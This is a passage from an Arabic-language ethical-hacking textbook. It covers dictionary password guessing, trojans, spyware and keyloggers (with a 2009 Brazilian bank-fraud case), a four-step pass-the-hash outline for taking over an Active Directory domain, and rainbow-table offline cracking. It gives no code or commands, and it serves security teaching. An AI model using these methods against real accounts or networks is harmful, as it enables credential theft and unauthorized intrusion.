‫اﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻌﺎﻣﻼت اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﻣﻊ اﻟﻣﺳﺎﻋدة ﻣن ﻣﻧﮭﺟﯾﺎت ھﺟوم اﻟﻘﺎﻣوس)‪ ، (dictionary attack‬ﻓﺎن اﻟﻣﺗﺳﻠل ﯾﺣﺎول اﻟﻌدﯾد ﻣن‬
‫اﻟوﺳﺎﺋل ﻟﺗﺧﻣﯾن ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﻓﻲ ھذه اﻟﻣﻧﮭﺟﯾﺔ‪ ،‬اﻟﻣﮭﺎﺟم ﯾﺄﺧذ ﻣﺟﻣوﻋﺔ ﻣن ﻛﻠﻣﺎت واﺳﻣﺎء اﻟﻘﺎﻣوس )‪ ،(dictionary‬وﯾﺟﻌل‬
‫ﺟﻣﯾﻊ اﻟﺗوﻟﯾﻔﺎت اﻟﻣﻣﻛﻧﺔ ﻟﻠﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك‪ .‬اﻟﻣﮭﺎﺟم ﯾﻧﻔذ ھذا اﻷﺳﻠوب ﻣﻊ اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺧﻣن اﻟﻣﺋﺎت أو اﻵﻻف ﻣن‬
‫اﻟﻛﻠﻣﺎت ﻓﻲ اﻟﺛﺎﻧﯾﺔ اﻟواﺣدة‪ .‬ھذا ﯾﺟﻌل ﻣن اﻟﺳﮭل ﺑﺎﻟﻧﺳﺑﺔ ﻟﮭم ﻓﻲ ﻣﺣﺎوﻟﺔ اﻟﻌدﯾد ﻣن اﻻﺧﺗﻼﻓﺎت‪different ،backwards words :‬‬
‫‪ ،capitalization‬إﺿﺎﻓﺔ أرﻗﺎم اﻟﻰ اﻟﻧﮭﺎﯾﺔ‪ ،‬اﻟﺦ‪.‬‬
‫ﻟﺗﺳﮭﯾل ھذا ﺑدرﺟﺔ أﻛﺑر‪ ،‬ﻓﻘد ﺑﻧﺎ ﻣﺟﺗﻣﻊ اﻟﻣﮭﺎﺟﻣﯾن اﻟﻘواﻣﯾس اﻟﻛﺑﯾرة اﻟﺗﻲ ﺗﺗﺿﻣن ﻛﻠﻣﺎت ﻣن ﻟﻐﺎت أﺟﻧﺑﯾﺔ‪ ،‬أو أﺳﻣﺎء اﻷﺷﯾﺎء واﻷﻣﺎﻛن‬
‫واﻟﺑﻠدات ﻋﻠﻰ ﻏرار ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‪ .‬ﯾﻣﻛن اﻟﻣﮭﺎﺟﻣﯾن أﯾﺿﺎ ﻓﺣص اﻟﻣﻼﻣﺢ اﻟﺧﺎﺻﺔ ﺑك ﻟﻠﺑﺣث ﻋن اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﻗد ﺗﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‬
‫اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﻛﻠﻣﺔ ﻣرور اﻟﺟﯾدة ﻣن اﻟﺳﮭل أن ﻧﺗذﻛرھﺎ‪ ،‬وﻟﻛن ﻣن اﻟﺻﻌب ﺗﺧﻣﯾﻧﮭﺎ‪ ،‬ﻟذﻟك ﺗﺣﺗﺎج ﻟﺣﻣﺎﯾﺔ ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﻋن طرﯾﻖ‬
‫ﺟﻌﻠﮭﺎ ﺗظﮭر ﺑﺷﻛل ﻋﺷواﺋﻲ ﻋن طرﯾﻖ إدﺧﺎل أﺷﯾﺎء ﻣﺛل اﻷرﻗﺎم وﻋﻼﻣﺎت اﻟﺗرﻗﯾم‪ .‬ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك أﻛﺛر ﺗﻌﻘﯾدا‪ ،‬ﻟﺗﺻﺑﺢ أﻛﺛر ﺗﻌﻘﯾدا‬
‫ﻋﻠﻰ اﻟدﺧﯾل ﻟﻛﺳرھﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪327‬‬

‫ﺑﻌض اﻻﻋﺗﺑﺎرات ﻋن اﺳﺗﺧدام ﻋﻣﻠﯾﺔ ﺗﺧﻣﯾن ﻛﻠﻣﺎت اﻟﻣرور وھﻲ ﻛﻣﺎ ﯾﻠﻲ‪:‬‬
‫‪ -‬ﯾﺄﺧذ وﻗﺗﺎ طوﯾﻼ ﻟﺗﺧﻣﯾﻧﮭﺎ‪.‬‬
‫‪ -‬ﯾﺗطﻠب ﻛﻣﯾﺎت ھﺎﺋﻠﺔ ﻣن اﻟﻧطﺎق اﻟﺗرددي ﻟﻠﺷﺑﻛﺔ‪.‬‬
‫‪ -‬ﯾﻣﻛن اﻛﺗﺷﺎﻓﮫ ﺑﺳﮭوﻟﺔ‪.‬‬
‫‪Active Online Attack: Trojan/Spyware/Keylogger‬‬
‫ﺣﺻﺎن طروادة ‪Trojan‬ھو ﺷﻔرة ﺻﻐﯾرة ﯾﺗم ﺗﺣﻣﯾﻠﮭﺎ ﻣﻊ ﺑرﻧﺎﻣﺞ رﺋﯾﺳﻲ ﻣن اﻟﺑراﻣﺞ ذات اﻟﺷﻌﺑﯾﺔ اﻟﻌﺎﻟﯾﺔ‪ ،‬وﯾﻘوم ﺑﺑﻌض اﻟﻣﮭﺎم اﻟﺧﻔﯾﺔ‪ ،‬ﻏﺎﻟﺑﺎ ً‬
‫ﻣﺎ ﺗﺗرﻛز ﻋﻠﻰ إﺿﻌﺎف ﻗوى اﻟدﻓﺎع ﻟدى اﻟﺿﺣﯾﺔ أو اﺧﺗراق ﺟﮭﺎزه وﺳرﻗﺔ ﺑﯾﺎﻧﺎﺗﮫ‪.‬‬
‫ھو ﻧوع ﻣن اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ‪/‬اﻟﻣدﻣرة اﻟﺗﻲ ﻻ ﺗﺗﻧﺎﺳﺦ ﻣن ﺗﻠﻘﺎء ﻧﻔﺳﮭﺎ واﻟذي ﯾظﮭر ﻟﻛﻲ ﯾؤدي وظﯾﻔﺔ ﻣرﻏوب ﻓﯾﮭﺎ وﻟﻛن ﺑدﻻ ﻣن ذﻟك ﯾﻧﺳﺦ‬
‫ﺣﻣوﻟﺗﮫ اﻟﺧﺑﯾﺛﺔ‪ .‬اﻟﺑرﻧﺎﻣﺞ ﯾﺑدو ﻓﻲ اﻟﺑداﯾﺔ ﻷداء وظﯾﻔﺔ ﻣرﻏوب ﻓﯾﮫ‪ ،‬وﻟﻛن ﻓﻲ واﻗﻊ اﻻﻣر اﻧﮫ ﯾﺳرق اﻟﻣﻌﻠوﻣﺎت أو ﯾﺿر اﻟﻧظﺎم‪ .‬وﻓﻲ ﻛﺛﯾر ﻣن‬
‫اﻷﺣﯾﺎن ﯾﻌﺗﻣد ﻋﻠﻰ اﻷﺑواب اﻟﺧﻠﻔﯾﺔ )‪(backdoor‬أو اﻟﺛﻐرات اﻷﻣﻧﯾﺔ اﻟﺗﻲ ﺗﺗﯾﺢ اﻟوﺻول اﻟﻐﯾر اﻟﻣﺻرح ﺑﮫ إﻟﻰ اﻟﻛﻣﺑﯾوﺗر أو اﻟﺟﮭﺎز اﻟﮭدف‪.‬‬
‫وھذه اﻷﺑواب اﻟﺧﻠﻔﯾﺔ ﺗﻣﯾل إﻟﻰ أن ﺗﻛون ﻏﯾر ﻣرﺋﯾﺔ ﻟﻠﻣﺳﺗﺧدﻣﯾن اﻟﻌﺎدﯾﯾن‪ .‬أﺣﺻﻧﺔ طروادة ﻻ ﺗﺣﺎول ﺣﻘن ﻧﻔﺳﮭﺎ ﻓﻲ ﻣﻠﻔﺎت أﺧرى ﻣﺛل‬
‫ﻓﯾروﺳﺎت اﻟﻛﻣﺑﯾوﺗر‪ .‬أﺣﺻﻧﺔ طروادة ﻗد ﺗﺳرق اﻟﻣﻌﻠوﻣﺎت‪ ،‬أو ﺗﺿر ﺑﺄﻧظﻣﺔ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺿﯾف‪ .‬وﻗد ﺗﺳﺗﺧدم اﻟﺗﻧزﯾﻼت ﺑواﺳطﺔ اﻟﻣﺣرﻛﺎت‬
‫أو ﻋن طرﯾﻖ ﺗﺛﺑﯾت اﻷﻟﻌﺎب ﻋﺑر اﻹﻧﺗرﻧت أو اﻟﺗطﺑﯾﻘﺎت اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ اﻹﻧﺗرﻧت ﻣن أﺟل اﻟوﺻول إﻟﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف‪ .‬واﻟﻣﺻطﻠﺢ‬
‫ﻣﺷﺗﻖ ﻣن ﻗﺻﺔ ﺣﺻﺎن طروادة ﻓﻲ اﻷﺳﺎطﯾر اﻟﯾوﻧﺎﻧﯾﺔ ﻷن أﺣﺻﻧﺔ طروادة ﺗﺳﺗﺧدم ﺷﻛﻼ ﻣن أﺷﻛﺎل "اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ"‪ ،‬وﺗﻘوم ﺑﺗﻘدﯾم‬
‫ﻧﻔﺳﮭﺎ ﻋﻠﻰ أﻧﮭﺎ ﻏﯾر ﻣؤذﯾﺔ‪ ،‬وﻣﻔﯾدة‪ ،‬ﻣن أﺟل إﻗﻧﺎع اﻟﺿﺣﺎﯾﺎ ﻟﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮭم‪.‬‬

‫ﺑراﻣﺞ اﻟﺗﺟﺳس )‪ (spyware‬ھﻲ ﺑراﻣﺞ ﺣﺎﺳوﺑﯾﺔ ﺗﺛﺑت ﺧﻠﺳﺔ ﻋﻠﻰ أﺟﮭزة اﻟﺣﺎﺳوب ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﻟﻣﺳﺗﺧدﻣﯾن أو ﻟﻠﺳﯾطرة ﺟزﺋﯾًﺎ ﻋﻠﻰ‬
‫اﻟﺣﺎﺳوب اﻟﺷﺧﺻﻲ‪ ،‬وھذا ﻣن دون ﻋﻠم اﻟﻣﺳﺗﺧدم‪ .‬وﻓﻲ ﺣﯾن أن اﻻﺳم )ﺑراﻣﺞ اﻟﺗﺟﺳس( ﯾﺷﯾر إﻟﻰ اﻟﺑراﻣﺞ اﻟﺳرﯾﺔ اﻟﺗﻲ ﺗراﻗب ﺳﻠوك‬
‫اﻟﻣﺳﺗﺧدﻣﯾن‪ ،‬إﻟﻰ أن ﻣﮭﺎﻣﮭﺎ ﺗﺗﺟﺎوز ﺑﻛﺛﯾر ﻣﺟرد اﻟرﺻد‪ .‬ﺑراﻣﺞ اﻟﺗﺟﺳس ﯾﻣﻛﻧﮭﺎ ﺟﻣﻊ ﻣﺧﺗﻠف اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ‪ ،‬ﻣﺛل ﺗﺻﻔﺢ اﻹﻧﺗرﻧت‪،‬‬
‫ورﺻد اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪ .‬وﯾﻣﻛن ﻟﮭذه اﻟﺑراﻣﺞ أﯾﺿﺎ أن ﺗﺳﯾطر ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺻﺎب ﺑﮭﺎ‪ ،‬وﺗﺗﺣﻛم ﺑﮫ وﺗﻘوم ﺑﻌدة ﻣﮭﺎم‪ ،‬ﻣﺛل‪:‬‬
‫ﺗرﻛﯾب ﺑراﻣﺞ إﺿﺎﻓﯾﺔ‪ ،‬ﺗﺣوﯾل ﻋﺎﺋدات دﻋﺎﺋﯾﺔ ﻟطرف ﺛﺎﻟث‪ ،‬ﺗﻐﯾﯾر اﻟﺻﻔﺣﺔ اﻟرﺋﯾﺳﯾﺔ ﻟﻣﺳﺗﻌرض اﻟوﯾب‪ ،‬إﻋﺎدة ﺗوﺟﯾﮫ ﻣﺳﺗﻌرض اﻟوﯾب‪،‬‬
‫ﺗوﺟﯾﮫ ﻟﻣواﻗﻊ وﯾب ﺿﺎرة وﻣﻔﺧﺧﺔ واﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ ان ﺗﺗﺳﺑب ﻓﻲ اﻟﻣزﯾد ﻣن اﻟﻔﯾروﺳﺎت‪ .‬ﯾﻣﻛن أﯾﺿﺎ ﻟﺑراﻣﺞ اﻟﺗﺟﺳس أن ﺗﻐﯾر إﻋدادات‬
‫اﻟﻛﻣﺑﯾوﺗر‪ ،‬ﻣﻣﺎ ﻗد ﯾؤدي إﻟﻰ ﺑطﺋﮫ واﻟﺗﺄﺛﯾر ﻋﻠﻰ اﻻﺗﺻﺎل ﺑﺷﺑﻛﺔ اﻻﻧﺗرﻧت‪ .‬وﻣﻊ ظﮭور ﺑراﻣﺞ اﻟﺗﺟﺳس ظﮭرت ﻣﻌﮭﺎ ﺻﻧﺎﻋﺎت ﺻﻐﯾرة ﺣﺗﻰ‬
‫ﻓﻲ اﻟﺗﻌﺎﻣل ﻣﻊ ﻣﻛﺎﻓﺣﺗﮭﺎ‪ ،‬وﻗد أﺻﺑﺣت ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس ﻣن أھم اﻟﺑراﻣﺞ ﻓﻲ ﻣﺟﺎل أﻣن اﻟﻛﻣﺑﯾوﺗر‪ ،‬وﻗد أﺻدرت ﻋدة ﻗواﻧﯾن ﻓﻲ ﻣﺧﺗﻠف‬
‫أﻧﺣﺎء اﻟﻌﺎﻟم ﺗدﯾن اﻟﻣﺗﺳﺑﺑﯾن ﺑﮭذه اﻟﺑراﻣﺞ واﻟﺗﻲ ﺗرﻛب ﺧﻔﯾﺔ ﻓﻲ اﻟﻛﻣﺑﯾوﺗر ﺑﮭدف اﻟﺳﯾطرة ﻋﻠﯾﮫ‪.‬‬

‫‪ Keylogger‬ﯾﺳﻣﻰ راﺻد ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ أو أﺣد ﺑراﻣﺞ اﻟﺗﺟﺳس وھو ﺑرﻧﺎﻣﺞ ﻣﺧﻔﻲ ﯾرﺳل ﻋﺑر اﻹﯾﻣﯾل أو اﻧت ﺗﻘوم ﺑﺗﺣﻣﯾﻠﮫ ﻣن أﺣد اﻟﻣواﻗﻊ‬
‫ﻏﯾر اﻟﻣوﺛوﻗﺔ أو ﯾﻛون ﺿﻣن اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ واﻧت ﻻ ﺗﻌﻠم ﺑذﻟك‪ .‬ﺣﯾث ﯾﻘوم ﺑرﻧﺎﻣﺞ اﻟﺗﺟﺳس ﺑﻧﻘل ﻛﺎﻓﺔ ﻣﺎ ﯾﻛﺗب ﺑﻠوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ إﻟﻰ ﺟﮭﺎت‬
‫ﺑﻌﯾدة ﻋﺎدة إﻟﻰ ﺻﺎﺣب اﻟﺗﺟﺳس أو ﻣرﺳل اﻟﺑرﻧﺎﻣﺞ‪ ،‬وھذا ھو أﺧطر ھذه اﻟﻛﺎﺋﻧﺎت واﻟذي ﯾﻌد ﻋﻣﻠﮫ أﺷﺑﮫ ﻣﺎ ﯾﻛون ﺑﻌﻣل ﺣﺻﺎن طروادة أﺣد‬
‫أﻧواع ﻓﯾروﺳﺎت اﻟﺗﺟﺳس وﯾﺳﺗﺧدم ﻟﻣراﻗﺑﺔ أﺟﮭزة ﻣﻌﯾﻧﺔ وﻣﻌرﻓﺔ ﻣﺎ ﯾﻛﺗب ﻋﻠﯾﮭﺎ‪ .‬ﻣﺛل ارﻗﺎم اﻟﺳر وﻛﻠﻣﺎت اﻟدﺧول ارﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ .‬ﻓﻲ‬
‫ﻣﻧﺗﺻف ﺷﮭر ﻓﺑراﯾر ﺳﻧﺔ ‪ ،2009‬ھﺎﺟﻣت اﻟﺷرطﺔ اﻟﻔﯾدراﻟﯾﺔ اﻟﺑرازﯾﻠﯾﺔ ﻣواﻗﻊ ﻓﻲ اﻟﻣدﯾﻧﺔ اﻟﺟﻧوﺑﯾﺔ وﻣﻧﺎطﻖ أﺧرى وأﻟﻘوا اﻟﻘﺑض ﻋﻠﻰ ‪55‬‬
‫ﺷﺧﺻﺎ ً – ﺗﺳﻌﺔ ‪ Keylogging‬ﻣﻧﮭم ﺗﺣت اﻟﺳن اﻟﻘﺎﻧوﻧﻲ – ﺑﺗﮭﻣﺔ ﻧﺷر ﺑراﻣﺞ ﻣﺧﺗﻠﻔﺔ ﻓﻲ أﺟﮭزة أﻋداد ﻛﺑﯾره ﻣن اﻟﻣواطﻧﯾن اﻟﺑرازﯾﻠﯾﯾن‬
‫وﺳﺟﻠت ﻣﺎ ﻛﺗﺑوه ﺧﻼل اﺳﺗﺧداﻣﮭم ﻟﻠﻛﻣﺑﯾوﺗر ﻟﻠوﺻول إﻟﻰ ﺣﺳﺎﺑﺎﺗﮭم اﻟﺑﻧﻛﯾﺔ ﻋﻠﻰ اﻹﻧﺗرﻧت‪ ...‬اﻟﺑراﻣﺞ اﻟﺻﻐﯾرة ﺟدا ً ﻗﺎﻣت ﺑﺗﺳﺟﯾل أﺳﻣﺎء‬
‫اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت ﻣرورھم وأرﺳﻠﺗﮭﺎ إﻟﻰ أﻓراد اﻟﻌﺻﺎﺑﺔ‪ ...‬اﻟﻣﺑﺎﻟﻎ اﻟﺗﻲ ﺗﻣت ﺳرﻗﺗﮭﺎ ﺑﮭذه اﻟطرﯾﻘﺔ؟ ﻣﻧذ ﺑداﯾﺗﮭم اﻟﻌﻣل ﺑﮭذا اﻷﺳﻠوب ﻓﻲ‬
‫ﺷﮭر ﻣﺎﯾو ﻣن اﻟﻌﺎم اﻟﻣﻧﺻرم‪ 4.7 :‬ﻣﻠﯾون دوﻻر ﻣن ﻣﺋﺗﻲ ﺣﺳﺎب ﺑﻧﻛﻲ ﻣﺧﺗﻠف ﻓﻲ ﺳﺗﺔ ﺑﻧوك‪.‬‬

‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ Keylogger ،‬ﻗﺎدر ﻋﻠﻰ اﻟﻛﺷف ﻋن ﻣﺣﺗوﯾﺎت ﺟﻣﯾﻊ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺗﻲ ﺗﺗﺄﻟف ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻣن ﻧظﺎم‬
‫اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗم ﺗﺛﺑﯾت ‪ Keylogger‬ﻋﻠﯾﮫ‪.‬‬

‫‪Active Online Attack: Hash Injection Attack‬‬


‫ھﺟوم ﺣﻘن اﻟﮭﺎش )‪ (Hash Injection Attack‬ھو ﻣﻔﮭوم ﻟﺣﻘن ‪ compromised hash‬ﻓﻲ ﺟﻠﺳﺔ ﻣﺣﻠﯾﺔ ﺛم ﯾﺗم اﺳﺗﺧدام ھذا اﻟﮭﺎش‬
‫ﻟﻠﻣﺻﺎدﻗﺔ إﻟﻰ ﻣوارد اﻟﺷﺑﻛﺔ‪ .‬وﯾﺗم ھذا اﻟﮭﺟوم ﺑﻧﺟﺎح ﻓﻲ أرﺑﻊ ﺧطوات‪ .‬وھم‪:‬‬
‫‪1- The hacker compromises one workstation/server using a local/remote exploit‬‬
‫ﺣﯾث ﯾﻘوم اﻟﻣﮭﺎﺟم ﺑﺎﺧﺗراق ﺧﺎدم او ﺟﮭﺎز ﻋﻣﯾل ﻣن ﺧﻼل ‪ exploit‬ﺳواء ﻣﺣﻠﯾﺎ او ﻋن ﺑﻌد‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪328‬‬

‫‪2- The hacker extracts logged-on hashes and finds a logged-on domain admin account hash‬‬
‫اﻟﻘراﺻﻧﺔ ﯾﻘوﻣون ﺑﺎﺳﺗﺧراج اﻟﮭﺎش اﻟﺧﺎص ﺑﻌﻣﻠﯾﺎت اﻟﺗﺳﺟﯾل ﺛم ﯾﺟد اﻟﮭﺎش اﻟﺧﺎص ﺑﻌﻣﻠﯾﺔ اﻟﺗﺳﺟﯾل ﻣن ﻗﺑل ﻣﺳﺋول اﻟدوﻣﯾن‪.‬‬
‫‪3- The hackers use the hash to log on the domain controller‬‬
‫اﻟﻘراﺻﻧﺔ ﯾﻘوﻣون ﺑﺎﺳﺗﺧدام ھذا اﻟﮭﺎش ﻟﺗﺳﺟﯾل اﻟدﺧول اﻟﻰ وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن‪.‬‬
‫‪4- The hacker extracts all the hashes in the Active Directory database and can now satirize any account‬‬
‫‪in the domain.‬‬
‫اﻟﻘراﺻﻧﺔ ﯾﻘوﻣون ﺑﺎﺳﺗﺧراج ﻛﺎﻓﺔ اﻟﮭﺎش اﻟﻣوﺟودة ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ Active Directory‬وﯾﻣﻛﻧﮫ اﻵن ﯾﺳﺧر أي ﺣﺳﺎب ﻓﻲ اﻟدوﻣﯾن‪.‬‬

‫‪Offline Attack: Rainbow Attacks‬‬

‫‪ Offline Attack‬ﺗﺣدث ﻋﻧد ﯾﻘوم اﻟدﺧﯾل ﺑﺎﻟﺗﺣﻘﻖ ﻣن ﺻﺣﺔ ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﺣﯾث ﯾﻼﺣظ ﻛﯾف ﯾﺗم ﺗﺧزﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ .‬إذا ﺗم ﺗﺧزﯾن أﺳﻣﺎء‬
‫اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻣﻠف ﻗﺎﺑل ﻟﻠﻘراءة‪ ،‬ﻓﺎن ھذا ﯾﺻﺑﺢ ﺳﮭل ﺑﺎﻟﻧﺳﺑﺔ ﻟﮫ أو ﻟﮭﺎ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﺟب أن ﺗﻛون ﻗﺎﺋﻣﺔ‬
‫ﻛﻠﻣﺎت اﻟﻣرور ﻣﺣﻣﯾﮫ واﻻﺣﺗﻔﺎظ ﺑﮭﺎ ﻓﻲ ﺷﻛل ﻏﯾر ﻗﺎﺑل ﻟﻠﻘراءة‪ ،‬ﻣﺛل اﻟﺷﻛل اﻟﻣﺷﻔر‪ Offline Attack .‬ھﻲ ھﺟﻣﺎت ﻣﺿﯾﻌﺔ ﻟﻠوﻗت‪ .‬ﻛﺎﻧت‬
‫ﻣن ﻗﺑل ﻧﺎﺟﺣﺔ ﻷن ‪ LM hash‬ﯾﻣﻠك ﻧﻘطﺔ ﺿﻌف وھﻲ ﺻﻐر وﻗﺻر طول‪ . keyspace‬وﺗﺗوﻓر ﺗﻘﻧﯾﺎت ﻣﺧﺗﻠﻔﺔ ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور ﻋﻠﻰ‬
‫ﺷﺑﻛﺔ اﻻﻧﺗرﻧت‪.‬‬
‫ھﻧﺎك ﻧوﻋﺎن ﻣن ھﺟﻣﺎت ‪ Offline Attack‬اﻟﺗﻲ ﯾﺳﺗﺧدﻣﺎه اﻟﻣﮭﺎﺟم ﻻﻛﺗﺷﺎف ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬
‫‪Rainbow Attacks -‬‬
‫‪Distributed network Attacks -‬‬
‫‪Rainbow Attacks‬‬
‫‪ Rainbow attack‬ھو ﺗﻧﻔﯾذ ﻟﺗﻘﻧﯾﺔ ‪Cryptanalytic time-memory trade-off .cryptanalytic time-memory trade-off‬‬
‫ھو اﻷﺳﻠوب اﻟذي ﯾﺗطﻠب وﻗﺗﺎ أﻗل ﻟﺗﺣﻠﯾل اﻟﺷﻔرات‪ .‬ﻓﺈﻧﮫ ﯾﺳﺗﺧدم ﺑﺎﻟﻔﻌل ﺣﺳﺎب اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧزﻧﺔ ﻓﻲ اﻟذاﻛرة ﻟﻛﺳر اﻟﺗﺷﻔﯾر‪ .‬ﻓﻲ ھﺟوم‬
‫‪ ،Rainbow attack‬ﯾﺳﺗﺧدم ﻧﻔس اﻷﺳﻠوب؛ ﺣﯾث ﯾﺗم إﻧﺷﺎء ﺑطرﯾﻘﮫ ﻣﺗﻘدﻣﺔ ﺟدول ﯾﺣﺗوي ﻋﻠﻰ ھﺎش ﻟﻛﻠﻣﺎت ﻣرور ﺳﺎﺑﻘﮫ وﺗﺧزﯾﻧﮭﺎ ﻓﻲ‬
‫اﻟذاﻛرة‪ .‬وﯾﺳﻣﻰ ﻣﺛل ھذا اﻟﺟدول "‪." rainbow table‬‬
‫‪Rainbow Table‬‬
‫‪ Rainbow table‬ھو ﺟدول ﺑﺣث اﺳﺗﺧدم ﺧﺻﯾﺻﺎ ﻓﻲ اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﻣرور ﻟﻧص ﻋﺎدي ﻣن ﻧص ﻣﺷﻔر)‪ . (cipher text‬ﯾﺳﺗﺧدم‬
‫اﻟﻣﮭﺎﺟم ھذا اﻟﺟدول ﻓﻲ اﻟﺑﺣث ﻋن ﻛﻠﻣﺔ اﻟﻣرور وﯾﺣﺎول اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﻣرور ﻣن ھﺎش ﻛﻠﻣﺔ اﻟﺳر‪.‬‬
‫‪Computed Hashes‬‬
‫اﻟﻣﮭﺎﺟم ﯾﺣﺳب اﻟﮭﺎش ﻟﻠﺣﺻول ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ‪ ،‬ﺛم ﯾﻘﺎرن ذﻟك ﻣﻊ ﺟدول ھﺎش ﻣﺣﺳوب ﻣن ﻗﺑل )‪.(Rainbow table‬‬
‫إذا ﺗم اﻟﻌﺛور ﻋﻠﻰ ﺗطﺎﺑﻖ‪ ،‬إذا ﻓﺎن ﻛﻠﻣﺔ اﻟﻣرور ﺗم ﺣﻠﮭﺎ‪.‬‬
‫‪Compare the Hashes‬‬
‫ﻣن اﻟﺳﮭل اﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﻣرور ﻣن ﺧﻼل ﻣﻘﺎرﻧﺔ ھﺎش اﻟﻛﻠﻣﺔ اﻟﺗﻲ اﺳﺗوﻟﯾت ﻋﻠﯾﮭﺎ ﺑﺟدول ﻣﺣﺳوب ﻣﺳﺑﻘﺎ)‪. (pre-computed tables‬‬
‫‪Pre-Computed Hashes‬‬
‫ﯾﺟب أن ﯾﺗم ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة ﻓﻘط ﻓﻲ ﻣﻠف ﯾﺣﺗوي ﻋﻠﻰ اﺳم اﻟﻣﺳﺗﺧدم ‪ /‬ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺷﻔرة‪ .‬ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ‬
‫أﺛﻧﺎء ﻋﻣﻠﯾﺔ ﺗﺳﺟﯾل اﻟدﺧول ﯾﺗم ﺗﺷﻔﯾرھﺎ ﺑﺎﺳﺗﺧدام وظﯾﻔﺔ اﻟﮭﺎش ﻟﻠﺗﺷﻔﯾر‪ ،‬وﯾﺗم ﺑﻌد ذﻟك ﻣﻘﺎرﻧﺔ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ اﻟﻣﻠف‪.‬‬
‫ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة اﻟﺗﻲ ﯾﺗم ﺗﺧزﯾﻧﮭﺎ ﯾﻣﻛﻧﮭﺎ اﺛﺑﺎت اﻧﮭﺎ ﻋدﯾﻣﺔ اﻟﺟدوى ﺿد ھﺟﻣﺎت اﻟﻘﺎﻣوس)‪ . (dictionary attacks‬إذا ﻛﺎن اﻟﻣﻠف‬
‫اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺔ ﻣرور اﻟﻣﺷﻔرة ﻓﻲ ﺷﻛل ﻣﻘروء‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺑﺳﮭوﻟﺔ اﻛﺗﺷﺎف وظﯾﻔﺔ اﻟﮭﺎش‪ .‬وﻣن ﺛم ﯾﻣﻛﻧﮫ ﻓك ﺗﺷﻔﯾر ﻛل اﻟﻛﻠﻣﺎت‬
